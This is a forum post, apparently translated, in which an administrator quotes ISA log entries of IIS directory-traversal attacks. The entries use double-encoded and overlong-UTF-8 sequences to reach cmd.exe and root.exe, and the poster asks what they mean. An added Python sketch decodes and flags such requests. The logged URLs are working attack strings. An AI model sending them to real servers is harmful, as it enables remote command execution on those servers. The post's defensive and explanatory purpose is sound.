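Please help me take a look at these suspicious logs
Today I was going through the ISA logs and found some entries where hosts on the external network were accessing a web server that we have published from the internal network. It looks to me like someone is trying to get outside the IIS home directory to reach and run programs such as cmd.exe. I would like a detailed explanation of this kind of attack.
The log entries are as follows: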
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+dir
http://xxx.xxx.xxx.xxx/MSADC/root.exe?/c+dir
http://xxx.xxx.xxx.xxx/c/winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/d/winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
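What do things like ..%252f.. mean? And what kind of usage is cmd.exe?/c+dir?
Thanks. I have already downloaded and installed the IIS Lockdown Tool, so there shouldn't be any problem now, right?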
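
Added example, not part of the original post: a log-triage sketch that shows what the encoded sequences in these entries reduce to. It percent-decodes each path until it stops changing, folds two-byte overlong UTF-8 forms the way a lenient decoder would, and then flags `../` traversal and requests ending in cmd.exe or root.exe. The function names and the host `host.example` are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit

# Constructed sample requests in the style of the log above; the host is a placeholder.
SAMPLE = [
    "http://host.example/scripts/..%255c../winnt/system32/cmd.exe?/c+dir",
    "http://host.example/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
    "http://host.example/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir",
    "http://host.example/scripts/root.exe?/c+dir",
]

PCT = re.compile(rb"%([0-9A-Fa-f]{2})")
OVERLONG = re.compile(rb"([\xc0\xc1])(.)", re.S)

def pct_decode_once(b):
    """One pass of percent-decoding; '%25' becomes a literal '%'."""
    return PCT.sub(lambda m: bytes([int(m.group(1), 16)]), b)

def fold_overlong(b):
    """Map 'C0/C1 xx' (overlong two-byte forms) to the ASCII byte a lenient decoder yields."""
    return OVERLONG.sub(lambda m: bytes([((m.group(1)[0] & 0x1F) << 6) | (m.group(2)[0] & 0x3F)]), b)

def normalize(raw_path, max_rounds=5):
    """Decode until stable; report which encoding tricks were needed."""
    b, tricks, pct_rounds = raw_path.encode("latin-1", "replace"), set(), 0
    for _ in range(max_rounds):
        decoded = pct_decode_once(b)
        folded = fold_overlong(decoded)
        pct_rounds += decoded != b
        if folded != decoded:
            tricks.add("overlong-utf8")
        if folded == b:
            break
        b = folded
    if pct_rounds > 1:
        tricks.add("double-encoding")
    return b.replace(b"\\", b"/").lower().decode("latin-1"), tricks

def classify(url):
    """Return (normalized path, sorted findings) for one logged URL."""
    path, findings = normalize(urlsplit(url).path)
    if "../" in path:
        findings.add("traversal")
    if re.search(r"/(cmd|root)\.exe$", path):
        findings.add("shell-binary")
    return path, sorted(findings)

for u in SAMPLE:
    print(*classify(u))
```

In the query string a `+` stands for a space, so `cmd.exe?/c+dir` asks the server to run `cmd.exe /c dir`, that is, execute `dir` and exit.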